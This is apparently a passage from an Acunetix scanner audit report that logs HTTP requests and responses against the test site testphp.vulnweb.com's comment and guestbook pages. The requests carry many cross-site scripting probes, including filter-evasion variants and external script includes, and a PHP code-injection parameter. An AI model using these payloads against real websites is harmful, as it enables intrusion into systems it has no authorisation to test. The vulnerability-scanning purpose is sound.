Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(550605971471)%3B&comment=111-222-1933email@address Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 135 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=S ubmit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=-->alert(550655971471)%3B&comment=111-222-1933email@addre ss.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response Acunetix Website Audit

23

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 167 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=email@somealert(550665971471)%3Bdomain.com&comment=111-22 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 158 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(550635971471)%3B&comment=111-222-1933ema [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

24

/comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 155 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(550645971471)%3B&comment=111-222-1933email@ address.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>">alert(550625971471)%3B&comment=111-222-1933email@addre ss.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request GET /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

25

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login="+onmouseover=alert(468455921020)+;mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 183 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20 message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 161 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

26

Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&text=111-222-1933email@addre ss.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

27

Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 103 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=<%00script>alert(468195920936)%3B[email protected]&submi t=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 139 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&text [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

28

/guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 125 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28468235920936%29%3B%22%3E&text=111-222-1933e [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request Acunetix Website Audit

29

POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 130 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00"'>alert(468605921095)%3B&text=111-222-1933email@addre ss.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Acunetix Website Audit

30

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=

alert(468575921095)%3B&text=111-222-1933email@addr Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 107 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&s ubmit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 121 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3C/xss/*-*/style=xss:e/**/xpression(alert(468885921227))%3E&text=111-222-1933email @address.tst&submit=add%20message Response Acunetix Website Audit

31

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 133 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&text=111-2 [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 134 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

32

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00'">alert(468595921095)%3B&text=111-222-1933email@addre ss.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 140 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name="+src="http://testphp.acunetix.com/xss.js?468555921095">&tex [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

33

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=-->alert(467935920806)%3B&text=111-222-1933email@address Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 129 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=email@somealert(467945920806)%3Bdomain.com&text=111-222-1 [email protected]&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 132 Cookie: mycookie=3 Acunetix Website Audit

34

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28467965920806%29%3B%22%3E&text=111-2 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 117 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(467925920806)%3B&text=111-222-1933email@add ress.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>'>alert(467895920806)%3B&text=111-222-1933email@address. tst&submit=add%20message Acunetix Website Audit

35

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 120 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(467915920806)%3B&text=111-222-1933email@ address.tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 97 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&submit=add% 20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

36

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>">alert(467905920806)%3B&text=111-222-1933email@address. tst&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 109 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=alert(467885920806)%3B[email protected] &submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

37

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%00'">alert(469345921680)%3B&submit=add%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 113 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit =add%20message Response Acunetix Website Audit

39

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 127 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text="+src="http://testphp.acunetix.com/xss.js?46972 5922033">&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 120 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

40

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 100 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%3C/xss/*-*/style=xss:e/**/xpression(alert(469435921740))%3E&submit=a dd%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: 